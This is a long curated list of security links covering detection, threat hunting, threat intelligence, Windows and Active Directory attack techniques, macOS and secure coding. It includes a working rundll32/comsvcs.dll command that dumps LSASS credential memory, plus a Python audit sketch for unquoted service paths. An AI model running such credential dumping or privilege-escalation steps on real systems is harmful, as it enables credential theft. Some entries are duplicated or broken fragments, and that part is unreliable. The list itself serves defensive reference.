- CobaltStrikeScan
- Cobalt Strike Beacon Analysis - k/)
- How to Design Detection Logic - Part 1
- Mitigating Pass-the-Hash and Other Credential Theft
- Evilginx-ing into the cloud: How we detected a red team attack in AWS
- Hidden Shares as bait
- Blue Team 201: Detection
- The DML model
- hashlookup CIRCL API
- Best Practices for MITRE ATT&CK® Mapping - cert.cisa.gov/best-practices-mitre-attckr-mapping)
- Sysmon 12.0 — EventID 24 - us/sysinternals/downloads/sysmon) is out, with a new event ID: number 24. A very useful new feature, clipboard monitoring.
- SysmonX - In Replacement of Sysmon.
- SysmonSimulator
- Awesome Honeypots
- T-Pot
- Hunting and detecting Cobalt Strike
- BaselineTraining - Butt Training Program: Blue Team GO!" talk.
- Practical Training for Blue Teamers
- BLUE TEAM LABS ONLINE
- There are a lot of ways that folks distinguish between blue team roles. My focus is on investigative work and cognitive skills, so I divide those roles into the mental model shown in this diagram.
- Defining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis
- ATT&CK™ Navigator - navigator).
-
SIEM
- Auditing Continuously vs. Monitoring Continuously
- Scalable Logging and Tracking
- Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
- Suspicious Use of Procdump
- KrbRelayUp local privilege escalation.
- Events Heatmap
- plaso
- Heatmaps Make Ops Better
- graylog-guide-snort
- TALR
- Logsspot
- Logs were our lifeblood. Now they're our liability.
- Using Flume to Collect Apache 2 Web Server Logs
- spectx
- The log/event processing pipeline you can't have
- Here's a Splunk way to score behaviors that are derived from detections
- The Log Pile
- LORG
- Shipping to Elasticsearch Microsoft DNS Logs
- Windows 10 ETW Events - based and mof-based ETW providers across Windows 10 versions.
- Log Parser Lizard
- Laurel
- Corsair
- ProductLoggingTracker
- Part of my role is ensuring we're *not* EDR-centric. We have to be able to detect threats w/o OS-level viz (e.g., control plane only), using auth/net events, or whatever data is in a SIEM
-
Threat Hunting
- Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures
- Comprehensive Threat Intelligence
- Threat-Hunting
- ThreatHunter-Playbook
- HELK - [The Hunting ELK](https://github.com/Cyb3rWard0g/HELK): The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack.
- 3 of the main observed false positives I've learned while hunting for cmd.exe as a child proc of rundll32.exe (still one of the top 3 pref host for backdoors implemented as dll or alike) #threathunting (understanding this kind of FPs is as important as learning new/old TTPs traces)
- thethe - focused and expandable threat hunting environment. [The Threat Hunting Environment](https://github.com/ElevenPaths/thethe)
- Capturing Network Packets from Windows Endpoints with Network Shell (Netsh) ⚔️ and Azure Network Watcher 🌩
- cyber-threat-response-clinic
- opencti - Platform/opencti)
- securityonion - release) - Linux distro for threat hunting, enterprise security monitoring, and log management
- TheHive4py
- TheHiveIRPlaybook
- Cortex-Analyzers
- Nimbus Network - class threat intelligence.
- Threat Hunting Principles
- TypeDB CTI - a-knowledge-graph-for-cyber-threat-intelligence-with-typedb-bdb559a92d2a)
- Watcher
- Wireshark Tutorial: Exporting Objects from a Pcap
- Hex Packet Decoder
- Packetor - dump packet analyzer / decoder.
- Termshark
- Wireshark Tutorial: Wireshark Workshop Videos Now Available
- Wireshark Tutorial: Decrypting HTTPS Traffic
- Lookup Before You Go-Go...Hunting
- Insider Threat Hunting - all-in-numbers.html).
- Cyber Threat Intelligence
- Cloud Threat Hunting: Attack & Investigation Series- Lateral Movement – Under the Radar
- A Top 10 Reading List if You’re Getting Started in Cyber Threat Intelligence
- CTI SquadGoals
- Threat Intelligence Naming Conventions: Threat Actors, & Other Ways of Tracking Threats
- Datafeeds/API
- SQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike
- Paint it, Blue - Transitioning from CTI to HUNT
- MISP galaxy
- DigitalSide Threat-Intel - Intel repository. [API](https://github.com/davidonzo/apiosintDS)
- MISP-sizer
- MISP RPM
- MISP CERT.br
- MISP-maltego
- MISP Concepts Cheat sheet
- teslacoil.py
- traffic-analysis-workshop - tutorial-decrypting-HTTPS-traffic](https://github.com/pan-unit42/wireshark-tutorial-decrypting-HTTPS-traffic)
- Wazuh - ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance. [repo](https://github.com/wazuh/wazuh) and [ansible](https://github.com/wazuh/wazuh-ansible)
- Hunting the Hunters - RCE in Covenant C2
- Passive SSH - ssh](https://github.com/d4-project/passive-ssh)
- D4 core
- The State of Threat Hunting and the Role of the Analyst
- All Access Pass: Five Trends with Initial Access Brokers - access-broker-landscape.html) [tt](https://twitter.com/jorgeorchilles/status/1452739074775781390/photo/1)
- ansible MISP
- misp-warninglist - positives or other information in indicators
- misp-modules
- misp-taxonomies
- PyMISP
- MISP Training - Youtube CIRCL
- Youtube CIRCL
- Additional MISP training materials for law-enforcement agencies
- More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting - hacking-group-built-its-own-vpn-network/). [APT33, the Iranian hacking group behind Shamoon, built its own VPN network](https://twitter.com/campuscodi/status/1194872593750216704).
- Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack
- Adversary Reports
- APT29 targets COVID-19 vaccine development
- CyCAT.org API services - end server including crawlers.
- PyMISP and MISP Objects: a door to new opportunities
- What is APT28's Drovorub Malware? - 1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF)
- Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS' Malware at Scale
- More Evidence of APT Hackers-for-Hire Used for Industrial Espionage
- US Charges Five Alleged Members of APT41 Group
- Cyber Planning for Response and Recovery Study
- TA505
- SolarWinds Security Advisory
- If you work in a SOC, print out this screenshot & pin it to a wall in your office
- Customer Guidance on Recent Nation-State Cyber Attacks
- Mapping out AridViper Infrastructure Using Augury’s Malware Module
- The Story of Jian - Day
- APT Encounters of the Third Kind
- Lazarus APT conceals malicious code within BMP image to drop its RAT - found new [weaponized Word document](https://twitter.com/ESETresearch/status/1389904254811394049)
- Analysis of the Iranian cyber attack landscape
- Lemon Duck spreads its wings
- China’s PLA Unit 61419 Purchasing Foreign Antivirus Products, Likely for Exploitation
- The Active Adversary Playbook 2021
- An Update on Industrialize the Tracking of Botnet Operations
- Update on cyber activity in Eastern Europe
- Cisco Talos shares insights related to recent cyber attack on Cisco
- Analysis Report (AR20-268A)
- A Threat Actor Encyclopedia
- Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor - solarwinds/) [repo](https://github.com/ThunderGunExpress/BADministration), symantec: [Supply Chain Attack Targets SolarWinds Users](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds). [DGA domain names from](https://github.com/RedDrip7/SunBurst_DGA_Decode) SunBurst_DGA_Decode
- distribute malicious zip with lnk? MSHTA > wscript > new LNK in startup > Reboot > MSHTA > wscript.
- threat actor touching an endpoint
- Patchwork APT caught in its own web
- Armagedon/Gamaredon
- North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign
- Tracking A Malware Campaign Through VT
- Interesting large and small malspam attachments from 2023 - vbe.py) [scripts](https://github.com/JohnHammond/vbe-decoder/blob/master/vbe-decoder.py)
- Operation Triangulation: The last (hardware) mystery
- Additional MISP training materials (including slides, documentation and videos)
-
IoCs
- CVE-2020-1472 Zerologon IoCs
- Ryuk Speed Run, 2 Hours to Ransom
- What did DeathStalker hide between two ferns?
- Netfilter Rootkit Samples
- Feodo Tracker
- Emotet 2022 | epoch4 | 22.04.2022 |
- IcedID | 31.08.2022 | Campaign 2786525712
- sophos labs IoCs - originated indicators-of-compromise from published
- APT_Digital_Weapon - AnXin.
- Yikes, Microsoft have signed multiple rootkits (which allow kernel drivers) and reach out to a remote IP
- There are evil packages on the npm registry that deploy XMRIG
- 238 Cobalt Strike stage 2 IP's, with 238 unique configurations, identified today.
- malware-IoC
-
-
Browsers
-
SIEM
- Firefox: How a website could steal all your cookies
- SOK: On the Analysis of Web Browser Security
- Bypassing Browser Security Warnings with Pseudo Password Fields
- How To Blow Your Online Cover With URL Previews
- Nefarious LinkedIn
- autochrome
- BROWSERGAP
- browsergap.ce
- Crash Chrome
- Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique
- New Cache ATtacks on TLS Implementations
- Lightnion
- Puppeteer
- autochrome
- BROWSERGAP
- browsergap.ce
- Crash Chrome
- Firefox: How a website could steal all your cookies
- Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique
- Puppeteer
- SOK: On the Analysis of Web Browser Security
- Bypassing Browser Security Warnings with Pseudo Password Fields
- BROWSERGAP
- Crash Chrome
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- BROWSERGAP
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Nefarious LinkedIn
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
- Firefox: How a website could steal all your cookies
-
Browsers Addons
- LinkGopher
- WebDeveloper
- DownthemAll
- Uppity
- Cliget
- URLs List
- Link Redirect Trace
- Tamper Data for FF Quantum
- BuiltWith
- Wappalyzer
- Exif Viewer
- Anti-Grabify Browser Extension
- Addons for Firefox
- IPvFoo
- SixorNot
Operating Systems
Windows
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Introducing BloodHound 4.0: The Azure Update
- Case Study: Password Analysis with BloodHound
- Updating Mimikatz in Metasploit
- dll_to_exe
- pe-sieve - scans a process and dumps potentially malicious implants (replaced/injected PEs, shellcode, hooks, in-memory patches)
- A PowerShell utility to dynamically uncover a DCShadow attack
- MSRC
- DCSYNCMonitor
- Total Meltdown?
- Robber
- Remote-Desktop-Caching
- Dynamic Tracing in Windows 10 19H1
- Capturing NetNTLM Hashes with Office [DOT] XML Documents
- LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
- Windows Command-Line
- MSconsole
- PowerShell Remoting
- powerlessshell
- LogRM
- InvisiblePersistence
- Passing-the-Hash to NTLM Authenticated Web Applications
- Detours
- r0ak - a command-line utility to read/write/execute ring zero on Windows 10 systems
- SpeculationControl - PowerShell module that summarizes the state of Windows mitigations for speculative execution side channels such as CVE-2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown)
- Reverse Engineering Windows Defender - Bulazel's slides (pdf) and demo videos
- XOR encryption – Windows x64
- Building Cracked Binaries – Windows x64
- Windows Incident Response: Updates
- Event log 'Keywords' p1
- Windows 10 - Notifications
- UAC bypass using CreateNewLink COM interface
- Windows Privilege Escalation (Unquoted Path Service)
- Securing SCOM in a Privilege Tiered Access Model
- Windows Privilege Escalation Guide
- An introduction to privileged file operation abuse on Windows
- Control Flow Guard Teleportation - Interactive CTF Exploration Tool
- PsExec Local Privilege Escalation
- Remote NTLM relaying through meterpreter on Windows port 445
- Analyzing obfuscated powershell with shellcode - [Empire](https://github.com/EmpireProject/Empire): PowerShell and Python post-exploitation agent. [OVERVIEW OF EMPIRE 3.4 FEATURES](https://www.bc-security.org/post/overview-of-empire-3-4-features/)
- Empire 4.2 was just finalized over the weekend and we are excited to share some of the new features.
- SysmonTools
- Panache_Sysmon
- Hiding malware in Windows
- Bypassing AppLocker Custom Rules
- WSL Reloaded
- Windows oneliners to download remote payload and execute arbitrary code
- reflectivepotato
- Microsoft Windows win32k.sys - Security Research
- Lateral movement using URL Protocol
- One Windows Kernel
- The Dog Whisperer’s Handbook
- Attack and Defend Microsoft Enhanced Security Administrative Environment
- Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host
- How to steal NTLMv2 hashes using file download vulnerability in web application
- OrgKit - provision a new company with proper defaults in Windows, Office 365, and Azure
- Leveraging WSUS
- Yet another sdclt UAC bypass - abuses sdclt.exe, one of Windows' auto-elevated processes. These run with high integrity level without prompting the local admin with the usual UAC window.
- Reversing and Patching .NET Binaries with Embedded References
- Windows PowerShell Remoting
- .NET Manifesto
- Bypassing Windows User Account Control
- Run PowerShell without Powershell.exe
- Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor
- Privileged Access Workstations
- Activation Contexts - abusing application manifests to inject DLL-loading opportunities into every process, and to perform COM hijacking without touching the registry. Caveat: the manifest could be replaced by another version, possibly killing your persistence by surprise.
- Understanding WdBoot (Windows Defender ELAM)
- Microsoft Finally Releases Guidance and a Script to Change the KRBTGT Account
- Deploying honeytokens in Active Directory & How to trick attackers with deceptive BloodHound paths
- CrackMapExec
- Configuring Additional LSA Protection
- Getting Malicious Office Documents to Fire with Protected View Enabled
- Overview and Setup
- Blocking Process Creation
- Access Tokens and Access Checking
- Blocking DLL Loading
- A Speed-Research on Windows Explorer's Auto-Completion
- Microsoft Defender Advanced Threat Protection (ATP)
- SharePoint and Pwn
- DisableAntiSpyware
- Have you ever wondered what happens behind the scenes when you type your password into the Windows logon screen and hit enter?
- Certify SSL Manager
- Bypassing Credential Guard
- WSUS Attacks Part 1: Introducing PyWSUS
- This is about adding a $ account and having it not show up in `net users`.
- pestudio
- PEview
- FileAlyzer
- NTCore
- exeinfo
- Sysmon Internals
- Windows-driver-samples - Microsoft's Windows driver samples repository
- PVE CA Cert List Utility - lists a CA's issued certificates, including soon-to-expire ones
- Release the Kraken: Fileless injection into Windows Error Reporting service
- Windows security baselines
- The Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment
- Block process creations originating from PSExec and WMI commands
- VDM
- Live Patching Windows API Calls Using PowerShell
- fibratus
- Adventures in Dynamic Evasion
- Fully working SMB protocol implementation in webassembly
- Parent Process vs. Creator Process
- WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732)
- ntvdmx64
- Spectre exploits in the "wild"
- Security rapid modernization plan
- Windows & Active Directory Exploitation Cheat Sheet and Command Reference
- Finding writable folders and hijackable DLLs
- Do You Really Know About LSA Protection (RunAsPPL)? - [PPLdump](https://github.com/itm4n/PPLdump): dump the memory of a PPL with a userland exploit ([comments](https://twitter.com/itm4n/status/1385218719320875009))
- Running NetworkMiner in Windows Sandbox
- GetTempPathW function
- No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders
- Human-operated ransomware - a large and growing attack trend that represents a threat to organizations in every industry.
- Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft
- Microsoft Security Best Practices
- Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory
- EVERYONE GETS A ROOTKIT - WPBT weakness affecting all Windows-based devices since Windows 8.
- Backdoor .NET assemblies with… dnSpy
- If you ever see RDP events, you should parse out the RDP bitmap cache. It maps out bitmap images of a user's RDP session.
- Here are a few tool resources for using WinRM w/o PowerShell
- winrs
- Scripting in Windows Remote Management
- pywinrm
- Abusing Windows Remote Management (WinRM) with Metasploit
- Attacking RDP from Inside - smart card hijacking, unauthorized file system access to client machines and more
- Dynamic Invocation in .NET to bypass hooks
- LowBox Token Permissive Learning Mode
- DInjector
- Windows Kernel Introspection (WKI)
- Windows Persistence Techniques
- Gaining Domain Admin from Outside Active Directory - with Responder (LLMNR/NBT-NS/mDNS poisoner and NTLMv1/2 relay)
- Low Privilege Active Directory Enumeration from a non-Domain Joined Host
- Active Directory as a C2
- Escalating privileges with ACLs in Active Directory
- #TR19 Active Directory Security Track
- Penetration Testing Active Directory, Part I
- Penetration Testing Active Directory, Part II - continues from a foothold at a low privilege level, forcing us to do privilege escalation.
- Wagging the Dog - Abusing Resource-Based Constrained Delegation to Attack Active Directory.
- Exploiting PrivExchange
- BloodHound Database Creator
- ATTACK MAPPING WITH BLOODHOUND
- BloodHound.py
- Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT) - from [The Hacker Recipes](https://github.com/ShutdownRepo/The-Hacker-Recipes)
- Using Kerberos for Authentication Relay Attacks
- Kerberos Resource-Based Constrained Delegation
- Kerberos cheatsheet
- Bypassing AD account lockout for a compromised account
- Azure AD and ADFS best practices
- Domain Goodness
- LDAP Ping and Determining Your Machine’s Site
- Non-Admin NTLM Relaying & ETERNALBLUE Exploitation
- Active Directory administrative tier model
- Hunting for reconnaissance activities using LDAP search filters
- Faking an AD account password change is possible, but detectable.
- Building Free Active Directory Lab in Azure
- Configure the log analytics wizard
- Reset the krbtgt account password/keys
- GetNPUsers & Kerberos Pre-Auth Explained
- Vulnerable-AD
- EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE
- Active Directory Lab Setup Tool
- Enabling Active Directory DNS query logging
- Detecting CVE-2020-1472 (CISA ED 20-04) Using Splunk Attack Range
- Still Passing the Hash 15 Years Later
- Detecting Abuse of Authentication Mechanisms
- Detecting the Elusive: Active Directory Threat Hunting
- Exporting AD FS certificates revisited: Tactics, Techniques and Procedures
- GPO Abuse: “You can’t see me”
- SERVER (UN)TRUST ACCOUNT
- Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability
- Cobalt strike MANUALS_V2
- Active Directory (Attack & Defense)
- Your Azure AD Connect server ... it's a Tier 0 asset
- Shooting Up: On-Prem to Cloud — Detecting “AADConnect” Creds Dump
- From Zero to Domain Admin
- Attacking Active Directory: 0 to 0.9
- Offensive WMI - Active Directory Enumeration - Part [2](https://0xinfection.github.io/posts/wmi-classes-methods-part-2/), [3](https://0xinfection.github.io/posts/wmi-registry-part-3/), [4](https://0xinfection.github.io/posts/wmi-recon-enum/) and [5](https://0xinfection.github.io/posts/wmi-ad-enum/).
- SID filter as security boundary between domains? (Part 7) - Trust account attack - from trusting to trusted
- Harvesting Active Directory credentials via HTTP Request Smuggling
- Protection of privileged users and groups by Azure AD Restricted Management Administrative Units
- Walk-through Mimikatz sekurlsa module
- Mimikatz: mitigating credential theft attacks (in Portuguese)
- PERFORMING PASS-THE-HASH ATTACKS WITH MIMIKATZ
- Protecting RDP Passwords from Mimikatz Using Remote Credential Guard
- Capturing Credentials with mimikatz
- Dumping User Passwords from Windows Memory with Mimikatz
- CredentialDumping without Mimikatz - dump LSASS through the MiniDump export of comsvcs.dll (requires an elevated PowerShell with SeDebugPrivilege): `rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\<NAME>.dmp full; Wait-Process -Id (Get-Process rundll32).Id`
- Dumping Lsass Without Mimikatz
- PowerShell Gallery
- Example of Malicious DLL Injected in PowerShell
- POWERSHELL LOGGING: OBFUSCATION AND SOME NEW(ISH) BYPASSES PART 1
- DevSec Defense - How DevOps Practices Can Drive Detection Development For Defenders
- Geeking out with UEFI, again
- PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection
- PowerShell Obfuscation
- Basic PowerShell for Pentesters
- Understanding and Bypassing AMSI
- Exploring PowerShell AMSI and Logging Evasion
- AMSI.fail
- INTRODUCTION TO SANDBOX EVASION AND AMSI BYPASSES
- comsvcs MiniDump examples
- Beginning PowerShell Empire - Packet Analysis
- Detailed properties in the Office 365 audit log
- Office 365 Mail Forwarding Rules (and other Mail Rules too)
- Application Guard for Office (public preview) for admins
- Exploiting MFA Inconsistencies on Microsoft Services
- Making Clouds Rain :: Remote Code Execution in Microsoft Office 365
- How to hunt for LDAP reconnaissance within M365 Defender?
- Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs
- Reproducing The ProxyShell Pwn2Own Exploit
- ProxyLogon is Just the Tip of the Iceberg
- PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
- How Default Permissions on Microsoft Power Apps Exposed Millions
- Excel Recipe: Some VBA Code with a Touch of Excel4 Macro
- An XML-Obfuscated Office Document (CVE-2021-40444)
- Simple Analysis Of A CVE-2021-40444 .docx Document
- Five PE Analysis Tools Worth Looking At
- Six Facts about Address Space Layout Randomization on Windows
- How to bypass Defender in a few easy steps
- Certificate Services (AD-CS)
- CA configuration
- Certificate templates
- Access controls
- Web endpoints
- Pass the Certificate
- UnPAC the hash
- Shadow Credentials
- Windows Debugger API — The End of Versioned Structures
- Event Log Explorer™ for Windows event log analysis
- Preventing Mimikatz Attacks – Blue Team – Medium
- There are multiple threat actors using OneDrive in campaigns, straight up just linking OneDrive.
- All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021–38646)
- New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections
- EKFiddle
- Windows AllTools
- OffensiveCSharp
- PowerShell Scripts
- The worst of the two worlds: Excel meets Outlook
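The "Windows Privilege Escalation (Unquoted Path Service)" and "Finding writable folders and hijackable DLLs" entries above describe the same search-order bug; the following is an added example (not code from either write-up) that predicts, from an ImagePath string alone, which binaries Windows would try before the real service executable, and which of those an attacker could actually plant given a set of writable directories. The service table and the writable-directory set are constructed for the example; on a live host you would feed in ImagePath values from `HKLM\SYSTEM\CurrentControlSet\Services` and directories found writable with icacls or accesschk.

```python
r"""Predict the hijack points of an unquoted Windows service path.

Added example; not code from the linked write-ups. When a service's ImagePath
is unquoted and contains spaces, CreateProcess tries each space-delimited
prefix as an executable before the real binary, so a writable directory along
the path lets a local user plant a binary the service (often SYSTEM) starts.
Works on path strings only, so it runs anywhere; SAMPLE_* values are constructed.
"""
import re

# Constructed sample: service name -> ImagePath as stored in the registry.
SAMPLE_SERVICES = {
    "VulnSvc": r"C:\Vendor Tools\Agent Service\bin\agent.exe -run",
    "SafeSvc": r'"C:\Vendor Tools\Agent Service\bin\agent.exe" -run',
    "NoSpaces": r"C:\Windows\System32\svchost.exe -k netsvcs",
}

# Constructed sample: directories a low-privilege user can write to
# (a vendor installing under a custom root with a weak ACL is the classic case).
SAMPLE_WRITABLE_DIRS = {r"C:\Vendor Tools"}


def hijack_candidates(image_path):
    r"""Return the paths Windows tries before the real binary, in search order.

    'C:\Vendor Tools\Agent Service\bin\agent.exe -run' yields
    ['C:\Vendor.exe', 'C:\Vendor Tools\Agent.exe'].
    Quoted paths and paths without spaces yield an empty list.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []
    # Treat everything up to the first '.exe' as the binary; the rest is arguments.
    m = re.match(r"(.*?\.exe)", path, flags=re.IGNORECASE)
    if not m:
        return []
    exe = m.group(1)
    # Each space splits off a prefix that CreateProcess tries as '<prefix>.exe'.
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def exploitable_candidates(image_path, writable_dirs):
    """Keep only candidates whose parent directory the attacker can write to."""
    writable = {d.rstrip("\\").lower() for d in writable_dirs}
    hits = []
    for cand in hijack_candidates(image_path):
        parent = cand.rsplit("\\", 1)[0].lower()
        if parent in writable:
            hits.append(cand)
    return hits


def audit_services(services, writable_dirs):
    """Map each vulnerable service to the binaries that would hijack it."""
    result = {}
    for name, path in services.items():
        hits = exploitable_candidates(path, writable_dirs)
        if hits:
            result[name] = hits
    return result


if __name__ == "__main__":
    for svc, paths in audit_services(SAMPLE_SERVICES, SAMPLE_WRITABLE_DIRS).items():
        print(svc, "->", paths)
```

The fix is the one the guide recommends: quote the ImagePath (`sc config VulnSvc binPath= "\"C:\Vendor Tools\Agent Service\bin\agent.exe\" -run"`) or tighten the ACL on the intermediate directories; after either change `hijack_candidates` or `exploitable_candidates` returns an empty list.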
macOS/iOS
- Apple Open Source - includes a mirror of the Security framework source
- Apple Lightning (cont.) - serial number reading
- Inside Code Signing
- Disabling MacOS SIP via a VirtualBox kext Vulnerability
- Remote Mac Exploitation Via Custom URL Schemes
- The Mac Malware of 2018
- Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage
- iOS12 Kernelcache Laundering
- inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
- A sample of the iOS malware - sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560
- Pair Locking your iPhone with Configurator 2
- KTRW
- Privilege Escalation | macOS Malware & The Path to Root Part 2 - [JSS-Scripts](https://github.com/bp88/JSS-Scripts): random scripts for use in Jamf Pro.
- Dylib Hijacking
- iOS Application Injection
- The Mac Malware of 2019 👾
- OSX.EvilQuest Uncovered
- Low-Level Process Hunting on macOS
- CVE-2020–9934: Bypassing TCC
- Attack Secure Boot of SEP
- Sinter - user-mode security enforcement for macOS. [A user-mode application authorization system for macOS written in Swift](https://github.com/trailofbits/sinter/)
- macOS-Fortress - firewall, blackhole and privatizing proxy with anti-virus on-demand and on-access scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav).
- From zero to tfp0 - Part 1: Prologue
- From zero to tfp0 - Part 2: A Walkthrough of the voucher_swap exploit
- We Hacked Apple for 3 Months: Here’s What We Found
- MACOS INJECTION VIA THIRD-PARTY FRAMEWORKS
- IPv6 security
- All Your Macs Are Belong To Us
- macOS Security Compliance Project
- TrueTree - pstree-like output on macOS with additional pid-capturing capabilities.
- Zero-Day TCC bypass discovered in XCSSET malware
- Dissecting the Apple M1 GPU, part I (series continues through part 4)
- M1RACLES - CVE-2021-30747 is a covert channel vulnerability in the Apple Silicon “M1” chip.
- Vulnerability Spotlight: A deep dive into macOS SMB server
- How to Use Kerberos on macOS
- Bypassing macOS TCC User Privacy Protections By Accident and Design
- Anecdotes About the macOS Sandbox File Limit
- SSD Advisory – macOS Finder RCE
- How malware gets into the App Store and why Apple can't stop that
- Quick Analysis for the SSID Format String Bug
- De Rebus Antiquis - [ios-kexec-utils](https://github.com/xerub/ios-kexec-utils), [iRecovery](https://github.com/xerub/irecovery) -> [new repo](https://github.com/Chronic-Dev/libirecovery), iOS [GID Key](https://www.theiphonewiki.com/wiki/GID_Key)
- UTM
- Dissecting TriangleDB, a Triangulation spyware implant
- Who put that in my Full Disk Access list? ssh and Mojave’s privacy protection
Others
- CLIP OS
- How to Get Started With VMware vSphere Security « vMiss.net
- routeros
- bochspwn-reloaded - Bochs-based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3
- Skadi
- taintgrind - a taint-tracking plugin for the Valgrind memory checking tool. [gcc + LD_PRELOAD + taintgrind + graphviz](https://gist.github.com/tkchia/8e4ce913ac28f07be64154cff8fef62e)
- UPX - a free, portable, high-performance executable packer for several executable formats. [repo](https://github.com/upx/upx)
- MF Sniffer
- Awesome-Study-Resources-for-Kernel-Hacking
Books
- Practical Cryptography for Developers - [book repo](https://github.com/nakov/practical-cryptography-for-developers-book)
- Security Engineering
- The Cyber Plumber's Handbook
- The Book of Secret Knowledge
Secure Programming
API
- API Security Testing
- The Web API Checklist
- REST API Checklist
- Your Comprehensive Web API Design Checklist
- Part 1 of 3
- Part 2 of 3
- Part 3 of 3
- How to contact Google SRE: Dropping a shell in cloud SQL
- MindAPI
- hack-requests - an HTTP network library for hackers
- Free API and Microservice Books
- Here you can find a variety of resources to help you out on the API security path.
- REST API Testing Tutorial
- REST Security Cheat Sheet
- Penetration Testing RESTful Web Services
- RESTful web services penetration testing
- Astra
- Introducing vAPI – an open source lab environment to learn about API security
- OWASP API Security Project
Tokens
- kcare-uchecker
- What science can tell us about C and C++'s security
- Executable-Space Protection and ASLR
- Gitian - a secure source-control oriented software distribution method.
- Canarytokens - quick, free detection tokens from Thinkst; [canaryfy](https://github.com/thinkst/canaryfy)
- CANARY FILES: GENERATING FAKE FILES TO DETECT CRITICAL DATA LOSS FROM COMPLEX COMPUTER NETWORKS
- How to Know if Someone Access your Files with Canary Tokens
- Web App Security 101
- part 1
- part 2
- part 3
- Ristretto - a technique for constructing prime-order groups with non-malleable encodings.
- SEI CERT C Coding Standard
- MSC24-C. Do not use deprecated or obsolescent functions
- US-CERT: memcpy_s() and memmove_s()
- Field Experience With Annex K — Bounds Checking Interfaces
- rubocop
- Librando - transparent code randomization for just-in-time compilers
- Checked C
- Practical case: Buffer Overflow 0x01
- A Git Horror Story
- An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure
- Tooling for verification of PGP signed commits
- How C array sizes become part of the binary interface of a library
- When the going gets tough
- GTER 47 | GTS 33 - Day 2 (part 1)
- HTTP Security Headers - A Complete Guide
- SAFECode - a non-profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods.
- Security Code Review 101
- Elliptic Curve Cryptography Explained
- How to Process Passwords as a Software Developer
- QL
- Sendy is Insecure
- Cheating in Elliptic Curve Billiards 2
- DevSecOps
- Most Popular Analysis Tools by Programming Language
- Deepsource
- A Graduate Course in Applied Cryptography
- Comments on build reproducibility
- Integrating Security in the Development Pipeline
- DazedAndConfused
- Package Hunter
- Awesome AppSec
- You don’t need reproducible builds.
- huskyCI
SAST
- Static analysis powered security scanner for your terraform code
- Coccinelle
- How disable comments make static analysis tools worse
- A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI
- Potential remote code execution in PyPI
- What's New with SAST + DAST
- DevSecOps with DAST and Security Hub
- Sonarqube Community Branch Plugin
- SAST Analyzers
- pip-audit - Google-backed tool that probes Python environments for vulnerable packages.
- Horusec
- Source Code Analysis Tools
- COVERITY SCAN
- Trojan Source - invisible vulnerabilities in source code via bidirectional Unicode control characters
- Warn users when a PR contains some characters - bidirectional control characters can be present but unseen, and thus missed during review. This PR adds a list of characters to warn users about if present in a PR; since the list is configurable, it can be extended as needed.
- A Guide On Implementing An Effective SAST Workflow
- Scan - a free open-source security audit tool for modern DevOps teams. [sast-scan](https://github.com/ShiftLeftSecurity/sast-scan): A Free & Open Source DevSecOps Platform.
